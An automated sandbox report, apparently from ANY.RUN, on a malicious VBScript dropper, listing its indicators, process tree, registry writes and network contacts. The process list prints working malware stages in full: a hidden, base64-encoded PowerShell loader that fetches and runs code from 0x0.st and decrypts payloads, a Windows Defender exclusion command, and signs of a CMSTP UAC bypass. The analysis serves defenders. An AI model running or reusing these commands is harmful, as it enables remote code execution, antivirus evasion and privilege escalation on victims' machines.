File name:

1.vbs

Full analysis: https://app.any.run/tasks/6ab06e15-c70a-432e-a60a-eced9dc67997
Verdict: Malicious activity
Analysis date: January 30, 2025, 09:35:01
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
wmi-base64
susp-powershell
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (41501), with CRLF line terminators
MD5:

0BAC4DEFDAA32E2C890218721FF822C1

SHA1:

7AAF8DB5D8F54D39B0D5F5075D40EC04356F4734

SHA256:

D4E6970B3DC07B711DD1C81242C7630BDAEE191089ABC4FC25167D636E7ECF7C

SSDEEP:

1536:2O0mqOTTo7ZyEmOHldhy9B5Lj5JYt8FtHf6Ju32cax03/20FFZo+6DJ1aPm:0/hy9fnXYY6x031FFoDJsPm

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 5488)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 6624)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 5488)
      • powershell.exe (PID: 5780)

    • Adds process to the Windows Defender exclusion list

      • dllhost.exe (PID: 6396)

    • Known privilege escalation attack

      • dllhost.exe (PID: 6396)

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 5488)

    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 5488)

    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 5488)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 5488)

  • SUSPICIOUS

    • Application launched itself

      • cmd.exe (PID: 6552)

    • Executing commands from a ".bat" file

      • wscript.exe (PID: 6388)
      • cmd.exe (PID: 6552)

    • Writes binary data to a Stream object (SCRIPT)

      • wscript.exe (PID: 6388)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 6388)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 6552)
      • wscript.exe (PID: 6388)

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 6624)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6388)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6624)
      • dllhost.exe (PID: 6396)

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 6624)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 6624)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 5488)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 5488)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 2168)

    • Script adds exclusion process to Windows Defender

      • dllhost.exe (PID: 6396)

    • Script adds exclusion path to Windows Defender

      • dllhost.exe (PID: 6396)

    • Executable content was dropped or overwritten

      • csc.exe (PID: 2168)

    • Probably UAC bypass using CMSTP.exe (Connection Manager service profile)

      • powershell.exe (PID: 6688)

    • Uses TASKKILL.EXE to kill process

      • dllhost.exe (PID: 6396)

  • INFO

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6688)

    • Checks supported languages

      • cvtres.exe (PID: 6536)

    • Create files in a temporary directory

      • cvtres.exe (PID: 6536)
      • csc.exe (PID: 2168)

    • Disables trace logs

      • cmstp.exe (PID: 6616)
      • powershell.exe (PID: 5488)

    • Checks transactions between databases Windows and Oracle

      • cmstp.exe (PID: 6616)

    • Found Base64 encoded access to Windows Identity via PowerShell (YARA)

      • cmd.exe (PID: 6624)
      • powershell.exe (PID: 6688)

    • Found Base64 encoded file access via PowerShell (YARA)

      • cmd.exe (PID: 6624)
      • powershell.exe (PID: 6688)

    • Found Base64 encoded reference to WMI classes (YARA)

      • cmd.exe (PID: 6624)
      • powershell.exe (PID: 6688)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • cmd.exe (PID: 6624)
      • powershell.exe (PID: 6688)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5780)

    • Creates files in the program directory

      • dllhost.exe (PID: 6396)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 5488)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 5488)

    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • cmd.exe (PID: 6624)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 5780)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 5488)

    • Checks proxy server information

      • powershell.exe (PID: 5488)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 5488)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
146
Monitored processes
15
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs cmstp.exe no specs CMSTPLUA powershell.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1616\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2168"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\pfhwruf0.cmdline"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll
4984taskkill /IM cmstp.exe /FC:\Windows\System32\taskkill.exedllhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Terminates Processes
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\taskkill.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
5488"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24gdWZ5cWRkbmJramZsam9wKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnbmsvTkJidTROemdSQndCSUJPWnUvUHZMc0hNSWdJMjZFbDZLV09aZWM0TT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ01xY0tpVUozOTdhMThsR3lUU1pyOXc9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gbHdpYXV6dGxubHRjcnduKCRwYXJhbV92YXIpewlJRVggJyRibGplYWNldW9mY2p0Y2x4cnVlZmVtZnBjPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGF1a2ZrYnZleGl1Y2VvbmhjdHVycGFqY249TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRiaG5yaW9mdWN6aXVvZWVoZnZ0cnZtZnF4PU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJGJsamVhY2V1b2ZjanRjbHhydWVmZW1mcGMsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGJobnJpb2Z1Y3ppdW9lZWhmdnRydm1mcXguQ29weVRvKCRhdWtma2J2ZXhpdWNlb25oY3R1cnBhamNuKTsJJGJobnJpb2Z1Y3ppdW9lZWhmdnRydm1mcXguRGlzcG9zZSgpOwkkYmxqZWFjZXVvZmNqdGNseHJ1ZWZlbWZwYy5EaXNwb3NlKCk7CSRhdWtma2J2ZXhpdWNlb25oY3R1cnBhamNuLkRpc3Bvc2UoKTsJJGF1a2ZrYnZleGl1Y2VvbmhjdHVycGFqY24uVG9BcnJheSgpO31mdW5jdGlvbiB3cnRndWhjbHNqcWxkbHJqYWp0cmJ2ZmpjKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckY3NseG16bGlyaXRpbW90b2hjb2ZubnBwa2tmcGxzcGJ3dGd3dHdwej1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhsd3ZseXNnemNuanJsa29jd25idXZ4enRybHRpeHZsbXBpYnF1ZWxyeXBpZmZrbGpyPSRjc2x4bXpsaXJpdGltb3RvaGNvZm5ucHBra2ZwbHNwYnd0Z3d0d3B6LkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29BQkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhsd3ZseXNnemNuanJsa29jd25idXZ4enRybHRpeHZsbXBpYnF1ZWxyeXBpZmZrbGpyLkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kZW9jaHdkYmp4eG16cHdlZmtwanNidnBlZSA9ICRlbnY6VVNFUk5BTUU7JG1xZHlqY25jdHByc3pkZHBpeW16d2h3eHcgPSAnQzpcVXNlcnNcJyArICRlb2Nod2Rianh4bXpwd2Vma3Bqc2J2cGVlICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbXFkeWpjbmN0cHJzemRkcGl5bXp3aHd4dzskZ2txa2Q9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRtcWR5amNuY3RwcnN6ZGRwaXltendod3h3KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkcndyIGluICRna3FrZCkgewlpZiAoJHJ3ci5TdGFydHNXaXRoKCc6OicpKQl7CQkkZnRmYmM9JHJ3ci5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZHJqdmh2ZnFpeW1icHRqamRjdXpzZ211bT1bc3RyaW5nW11dJGZ0ZmJjLlNwbGl0KCdcJyk7SUVYICcka2d3cHlvYWRyb29xc3Jna3ZwdG5yY2RseD1sd2lhdXp0bG5sdGNyd24gKHVmeXFkZG5ia2pmbGpvcCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRkcmp2aHZmcWl5bWJwdGpqZGN1enNnbXVtWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJG95cGFnd2VwanhvaWFqa2x4eGV1dGxsb3A9bHdpYXV6dGxubHRjcnduICh1ZnlxZGRuYmtqZmxqb3AgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZHJqdmh2ZnFpeW1icHRqamRjdXpzZ211bVsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt3cnRndWhjbHNqcWxkbHJqYWp0cmJ2ZmpjICRrZ3dweW9hZHJvb3FzcmdrdnB0bnJjZGx4ICRudWxsO3dydGd1aGNsc2pxbGRscmphanRyYnZmamMgJG95cGFnd2VwanhvaWFqa2x4eGV1dGxsb3AgKCxbc3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
5780powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exedllhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
6072\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exetaskkill.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6388"C:\WINDOWS\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\1.vbsC:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6396C:\WINDOWS\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}C:\Windows\System32\dllhost.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
6536C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES8CA3.tmp" "c:\Users\admin\AppData\Local\Temp\CSCBD17F79653524588AEF9BCFCBCDF6586.TMP"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
14.32.31326.0
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\vcruntime140_clr0400.dll
6552C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\c.bat" "C:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
Total events
18 120
Read events
18 108
Write events
12
Delete events
0

Modification events

(PID) Process:(6616) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(6616) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(6616) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(6616) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:FileTracingMask
Value:
(PID) Process:(6616) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(6616) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(6616) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(6616) cmstp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\Network Connections
Operation:writeName:DesktopShortcut
Value:
0
(PID) Process:(6396) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe
Operation:writeName:ProfileInstallPath
Value:
C:\ProgramData\Microsoft\Network\Connections\Cm
(PID) Process:(6396) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
Operation:writeName:SM_AccessoriesName
Value:
Accessories
Executable files
2
Suspicious files
6
Text files
13
Unknown types
0

Dropped files

PID
Process
Filename
Type
6688powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zoabmmfo.m4c.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6388wscript.exeC:\Users\admin\AppData\Local\Temp\c.battext
MD5:230BE88A8BF17AD1A61025E5809D0144
SHA256:382A7476FA7BA1A11CB5290553BB55D26393A46677F07F7CD76B602F471F8193
6688powershell.exeC:\Windows\Temp\333ivbol.inftext
MD5:27581DBBE3C3840CE72F99C21071898A
SHA256:C5F2BBDEBCCD52C3EBA3C97A251FFA2CCD01F64DE764E560F804045FE868D27B
2168csc.exeC:\Users\admin\AppData\Local\Temp\pfhwruf0.outtext
MD5:C8FA5A9F1B895F3899496BDA41FE8158
SHA256:1105747D46C139E6B565CB0A727254C1A57E5E32CAAEA963D006DE43E80A9C53
2168csc.exeC:\Users\admin\AppData\Local\Temp\CSCBD17F79653524588AEF9BCFCBCDF6586.TMPbinary
MD5:475EC3747DD04C992FCD22AEB40A13B0
SHA256:1C1FB3D4D19C20F229E74D51B963B5C95C0AEBD2D8BA0C688BA0ADAE8B98880D
6688powershell.exeC:\Users\admin\AppData\Local\Temp\pfhwruf0.0.cstext
MD5:B8106096972FB511E0CF8B99386ECF93
SHA256:49D2A0F78CBEC3D87396B6F52F791C66505EDEEC87A70D4CE45721288210DA02
2168csc.exeC:\Users\admin\AppData\Local\Temp\pfhwruf0.dllexecutable
MD5:F6423955CECA3B1CEF6B7F44CF724D3C
SHA256:1BB58F410249631EF9D54B1F22BAFE3E62DC7C6BD0855D1377B42EE96E1F6370
6536cvtres.exeC:\Users\admin\AppData\Local\Temp\RES8CA3.tmpbinary
MD5:8BB8ED20351B211B0B43B8A9D41206D3
SHA256:39C7626D0394A3A8114593794D57159BF5F3F7F4EF5DE06F36D2AB156A28F6FC
5780powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF139d6c.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
5780powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_m5vdaxi2.jsb.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
31
DNS requests
10
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1176
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6876
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6876
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
4556
backgroundTaskHost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1176
svchost.exe
20.190.160.128:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1176
svchost.exe
2.17.190.73:80
AKAMAI-AS
DE
unknown
1076
svchost.exe
23.218.210.69:443
go.microsoft.com
AKAMAI-AS
DE
whitelisted
5064
SearchApp.exe
92.123.104.15:443
Akamai International B.V.
DE
unknown
4328
svchost.exe
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
5488
powershell.exe
168.119.145.117:443
0x0.st
Hetzner Online GmbH
DE
suspicious
6876
SIHClient.exe
20.12.23.50:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
login.live.com
  • 20.190.160.128
  • 40.126.32.138
  • 40.126.32.134
  • 20.190.160.130
  • 40.126.32.133
  • 20.190.160.20
  • 20.190.160.67
  • 20.190.160.64
whitelisted
go.microsoft.com
  • 23.218.210.69
whitelisted
0x0.st
  • 168.119.145.117
unknown
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted
arc.msn.com
  • 20.223.36.55
whitelisted
fd.api.iris.microsoft.com
  • 20.74.47.205
whitelisted
nexusrules.officeapps.live.com
  • 52.111.229.48
whitelisted

Threats

PID
Process
Class
Message
2192
svchost.exe
Misc activity
ET FILE_SHARING File Sharing Related Domain in DNS Lookup (0x0 .st)
5488
powershell.exe
Misc activity
ET FILE_SHARING File Sharing Domain Observed in TLS SNI (0x0 .st)
No debug info